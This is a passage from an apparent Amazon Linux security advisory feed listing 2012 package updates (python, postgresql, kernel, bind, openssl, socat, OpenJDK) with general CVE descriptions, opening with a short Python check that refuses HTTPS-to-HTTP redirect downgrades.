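# Constructed redirect chains, as a gem server or mirror might send them.
CHAIN_OK = ["https://mirror.example/gems/rack.gem", "/gems/rack-1.4.gem"]
CHAIN_DOWNGRADE = ["/gems/rack.gem", "http://mirror.example/gems/rack.gem"]

if __name__ == "__main__":
    start = "https://rubygems.example/gems/rack.gem"
    print(follow_chain(start, CHAIN_OK))
    print("downgrade chain refused:", is_downgrade(start, CHAIN_DOWNGRADE))
```

Refusing the downgrade is the necessary check, but it only protects the transport; an attacker who controls the mirror itself can still serve a modified gem over HTTPS, which is why a hash or signature check on the downloaded artifact is the complementary control.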
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2125" title="" id="CVE-2012-2125" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rubygems-devel" version="1.8.11" release="3.1.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-devel-1.8.11-3.1.amzn1.noarch.rpm</filename></package><package name="rubygems" version="1.8.11" release="3.1.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems-1.8.11-3.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-80</id><title>Amazon Linux - ALAS-2012-80: medium priority package update for python26</title><issued date="2012-05-21 16:50:00" /><updated date="2014-09-14 16:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python26-devel" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.8" release="1.45.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.8-1.45.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.8" release="1.45.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.8-1.45.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.8" release="1.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.8-1.45.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-81</id><title>Amazon Linux - ALAS-2012-81: medium priority package update for python27</title><issued date="2012-05-21 16:52:00" /><updated date="2014-09-14 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0845:
SimpleXMLRPCServer.py in SimpleXMLRPCServer in Python before 2.6.8, 2.7.x before 2.7.3, 3.x before 3.1.5, and 3.2.x before 3.2.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via an XML-RPC POST request that contains a smaller amount of data than specified by the Content-Length header.
A flaw was found in the way the Python SimpleXMLRPCServer module handled clients disconnecting prematurely. A remote attacker could use this flaw to cause excessive CPU consumption on a server using SimpleXMLRPCServer.
789790:
CVE-2012-0845 python: SimpleXMLRPCServer CPU usage DoS via malformed XML-RPC request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0845" title="" id="CVE-2012-0845" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python27" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.3" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.3-1.18.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.3" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/python27-devel-2.7.3-1.18.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.3" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.3-1.18.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-82</id><title>Amazon Linux - ALAS-2012-82: medium priority package update for postgresql8</title><issued date="2012-05-23 10:08:00" /><updated date="2014-09-14 16:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0868:
The pg_dump utility inserted object names literally into comments in the SQL script it produces. An unprivileged database user could create an object whose name includes a newline followed by an SQL command. This SQL command might then be executed by a privileged user during later restore of the backup dump, allowing privilege escalation.
CRLF injection vulnerability in pg_dump in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 allows user-assisted remote attackers to execute arbitrary SQL commands via a crafted file containing object names with newlines, which are inserted into an SQL script that is used when the database is restored.
797917:
CVE-2012-0868 postgresql: SQL injection due to unsanitized newline characters in object names
CVE-2012-0867:
When configured to do SSL certificate verification, PostgreSQL only checked the first 31 characters of the certificate's Common Name field. Depending on the configuration, this could allow an attacker to impersonate a server or a client using a certificate from a trusted Certificate Authority issued for a different name.
PostgreSQL 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 truncates the common name to only 32 characters when verifying SSL certificates, which allows remote attackers to spoof connections when the host name is exactly 32 characters.
797915:
CVE-2012-0867 postgresql: MITM due to improper x509_v3 CN validation during certificate verification
CVE-2012-0866:
CREATE TRIGGER in PostgreSQL 8.3.x before 8.3.18, 8.4.x before 8.4.11, 9.0.x before 9.0.7, and 9.1.x before 9.1.3 does not properly check the execute permission for trigger functions marked SECURITY DEFINER, which allows remote authenticated users to execute otherwise restricted triggers on arbitrary data by installing the trigger on an attacker-owned table.
CREATE TRIGGER did not do a permissions check on the trigger function to be called. This could possibly allow an authenticated database user to call a privileged trigger function on data of their choosing.
797222:
CVE-2012-0866 postgresql: Absent permission checks on trigger function to be called when creating a trigger
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0866" title="" id="CVE-2012-0866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867" title="" id="CVE-2012-0867" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0868" title="" id="CVE-2012-0868" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0678.html" title="" id="RHSA-2012:0678" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-libs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-test" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.11" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql8-plpython-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.11" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.11-1.34.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plpython" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.11" release="1.34.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.11-1.34.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.11" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.11-1.34.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-83</id><title>Amazon Linux - ALAS-2012-83: medium priority package update for kernel</title><issued date="2012-06-10 11:46:00" /><updated date="2014-09-14 16:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2136:
The sock_alloc_send_pskb function in net/core/sock.c in the Linux kernel before 3.4.5 does not properly validate a certain length value, which allows local users to cause a denial of service (heap-based buffer overflow and system crash) or possibly gain privileges by leveraging access to a TUN/TAP device.
816289:
CVE-2012-2136 kernel: net: insufficient data_len validation in sock_alloc_send_pskb()
* It was found that the data_len parameter of the sock_alloc_send_pskb() function in the Linux kernel's networking implementation was not validated before use. A privileged guest user in a KVM guest could use this flaw to crash the host or, possibly, escalate their privileges on the host.
* It was found that the data_len parameter of the sock_alloc_send_pskb() function in the Linux kernel's networking implementation was not validated before use. A local user with access to a TUN/TAP virtual interface could use this flaw to crash the system or, potentially, escalate their privileges. Note that unprivileged users cannot access TUN/TAP devices until the root user grants them access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2136" title="" id="CVE-2012-2136" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0690.html" title="" id="RHSA-2012:0690" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.19-1.28.6.amzn1.noarch.rpm</filename></package><package name="kernel-headers" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.19-1.28.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" 
version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.19" release="1.28.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.19-1.28.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-84</id><title>Amazon Linux - ALAS-2012-84: important priority package update for bind</title><issued date="2012-06-10 11:47:00" /><updated date="2014-09-14 16:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1667:
ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
A flaw was found in the way BIND handled zero length resource data records. A malicious owner of a DNS domain could use this flaw to create specially-crafted DNS resource records that would cause a recursive resolver or secondary server to crash or, possibly, disclose portions of its memory.
828078:
CVE-2012-1667 bind: handling of zero length rdata can cause named to terminate unexpectedly
CVE-2012-1033:
The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack.
A flaw was found in the way BIND handled the updating of cached name server (NS) resource records. A malicious owner of a DNS domain could use this flaw to keep the domain resolvable by the BIND server even after the delegation was removed from the parent DNS zone. With this update, BIND limits the time-to-live of the replacement record to that of the time-to-live of the record being replaced.
788650:
CVE-2012-1033 bind: deleted domain name resolving flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1033" title="" id="CVE-2012-1033" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1667" title="" id="CVE-2012-1667" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0716.html" title="" id="RHSA-2012:0716" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind-chroot" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.7.6-1.P1.18.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package 
name="bind-libs" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.7.6" release="1.P1.18.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.7.6-1.P1.18.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-85</id><title>Amazon Linux - ALAS-2012-85: medium priority package update for openssl</title><issued date="2012-06-10 11:48:00" /><updated date="2014-09-14 16:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2333:
Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.
An integer underflow flaw, leading to a buffer over-read, was found in the way OpenSSL handled DTLS (Datagram Transport Layer Security) application data record lengths when using a block cipher in CBC (cipher-block chaining) mode. A malicious DTLS client or server could use this flaw to crash its DTLS connection peer.
820686:
CVE-2012-2333 openssl: record length handling integer underflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2333" title="" id="CVE-2012-2333" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0699.html" title="" id="RHSA-2012:0699" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openssl-static" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-static-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-devel-1.0.0j-1.43.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-devel-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-perl-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.0j" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.0j" release="1.43.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/openssl-static-1.0.0j-1.43.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-86</id><title>Amazon Linux - ALAS-2012-86: medium priority package update for python-crypto</title><issued date="2012-06-11 10:27:00" /><updated date="2014-09-14 16:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2417:
825162:
CVE-2012-2417 python-crypto: Insecure ElGamal key generation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2417" title="" id="CVE-2012-2417" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="python-crypto" version="2.3" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-2.3-6.5.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.3" release="6.5.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.3-6.5.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.3" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.3-6.5.amzn1.x86_64.rpm</filename></package><package name="python-crypto" version="2.3" release="6.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-2.3-6.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-87</id><title>Amazon Linux - ALAS-2012-87: medium priority package update for socat</title><issued date="2012-06-11 10:28:00" /><updated date="2014-09-14 16:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0219:
821552:
CVE-2012-0219 socat: heap-based buffer overflow flaw leads to arbitrary code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0219" title="" id="CVE-2012-0219" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="socat-debuginfo" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.1-1.6.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.1-1.6.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.1-1.6.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.1-1.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-88</id><title>Amazon Linux - ALAS-2012-88: important priority package update for java-1.6.0-openjdk</title><issued date="2012-06-19 15:58:00" /><updated date="2014-09-14 16:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1724:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, and 6 update 32 and earlier, allows remote attackers to affect availability, related to JAXP.
It was discovered that the Java XML parser did not properly handle certain XML documents. An attacker able to make a Java application parse a specially-crafted XML file could use this flaw to make the XML parser enter an infinite loop.
829374:
CVE-2012-1724 OpenJDK: XML parsing infinite loop (JAXP, 7157609)
CVE-2012-1723:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Multiple flaws were found in the way the Java HotSpot Virtual Machine verified the bytecode of the class file to be executed. A specially-crafted Java application or applet could use these flaws to crash the Java Virtual Machine, or bypass Java sandbox restrictions.
829373:
CVE-2012-1723 OpenJDK: insufficient field accessibility checks (HotSpot, 7152811)
CVE-2012-1718:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect availability via unknown vectors related to Security.
It was discovered that the Java security classes did not properly handle Certificate Revocation Lists (CRL). CRL containing entries with duplicate certificate serial numbers could have been ignored.
829372:
CVE-2012-1718 OpenJDK: CRL and certificate extensions handling improvements (Security, 7143872)
CVE-2012-1717:
